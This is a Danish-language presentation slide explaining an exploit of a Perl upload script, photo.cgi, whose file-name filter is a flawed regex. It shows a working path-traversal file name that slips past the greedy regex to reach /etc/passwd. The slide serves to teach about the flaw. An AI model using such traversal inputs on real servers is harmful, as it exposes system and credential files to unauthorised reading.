First page Back Continue Last page Summary Graphic
Exploit af photo.cgi - 2
-
$filename =lc($UPLOAD{'FILE_NAME'});
-
$filename =~ s/.+\\([^\\]+)$|.+\/([^\/]+)$/\1/;
-
../../../../../../etc/passwd dur ikke pga regexp.
-
(Han tror \1 = \001)
-
/jfs/\../../../../../../etc/passwd dur da regexp .+ laver
match first så længe alt matches